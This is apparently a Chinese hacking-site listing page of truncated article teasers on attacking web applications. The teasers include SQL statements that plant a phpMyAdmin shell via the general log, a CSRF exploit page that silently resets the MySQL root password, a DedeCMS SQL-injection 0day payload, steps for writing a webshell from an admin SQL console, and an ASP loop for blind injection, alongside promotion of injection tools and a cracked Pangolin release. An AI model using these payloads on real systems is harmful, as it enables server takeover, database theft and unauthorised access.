三个sql语句拿下phpmyadmin的shell
三个sql语句拿下phpmyadmin的shell 首先要知道路径 一句一句的执行 --------------------------------------------------------- set global general_log='on'; --------------------------------------------------------- SET global ge...
phpMyAdmin 4.7.x CSRF 漏洞利用
修改root密码: 保存为:webshell.html <p>Hello World</p> <img src="https://webshell.cc/sql.php?db=mysql&table=user&sql_query=SET%20password%20=%20PASSWORD(%27www.webshell.cc%27)" style="d...
BurpSuite集成Sqlmap神器!
设置很简单,这个已经是编译好的,只要在:extender-->extentions-->add 添加jar就OK了! 不过需要BurpSuite需要放到sqlmap根目录下! 本插件实现原理: 将目标请求的数据存放到临时文件中,然后调用"sqlmap.py -r $file"来启动对请求的sql注入检测 在Sqlmap tab中,你可以配置sqlmap除 -r外的其他参数,比如: 加入...
pangolin professinal edition 4.0.0.1293特别版
Pangolin是一款帮助渗透测试人员进行Sql注入测试的安全工具。下载版本为15天免费的,该工具支持数据库类型都是国内外主流使用的数据库类型,包括: Access, DB2, Informix, Microsoft SQL Server 2000, Microsoft SQL Server 2005, Microsoft SQL Server 2008, Mysql,...
DedeCMS会员中心分类管理SQL注射0day
漏洞描述: 需要magic_quotes_gpc = Off,所以说是鸡肋啊. 发生在数组key里的注射漏洞,有点意思. 这里是盲注,就是麻烦点同样可以利用,可以写个工具,自动话的跑一下 https://www.webshell.cc/member/mtypes.php?dopost=save exploit: mtypename[7' and (@`'` or (56%3D56/*sql inje...
学会使用这些工具,你就是合格的新手!
SQL Injection: 啊D 算是新手必用吧,比较简单,没有特别复杂的界面,一看就懂,批量扫描注入功能不错,配合搜索语法比较适合新手练手 明小子 比啊D多些功能,能够查询旁注,其中有个上传功能蛮不错的 NBSI 这个软件对于SQL server的注入有极高的准确率 Pangolin 俗称穿山甲啊,比较好用的注入工具,虽然大牛们说1.3版以后P...
利用后台SQL查询语句拿webshell
今天,朋友给了一个比较好玩的后台 有SQL查询功能 在后台的主页,或者备份什么的,可以得到网站的物理路径,这里我没有传马,直接点击了备份数据库,重点是得到物理路径,后台主页,或者各种爆物理路径,还要看运气和自由发挥了 以下拿webshell步骤 第一句代码 create table cmd (a varchar(5...
字符型SQL注入猜解,利用iframe显示更方便
遇到一个注入点 是字符型的 测试了几个工具 貌似都不行 那就只有手工了 大家都知道 到猜解值的时候 一个一个asc大小的比较 还是比较麻烦的 所以想到这个 <% for s=40 to 128 response.write "<iframe src=""https://www.webshell.cc/default.asp?id=111111' and 1=(select top 1 c...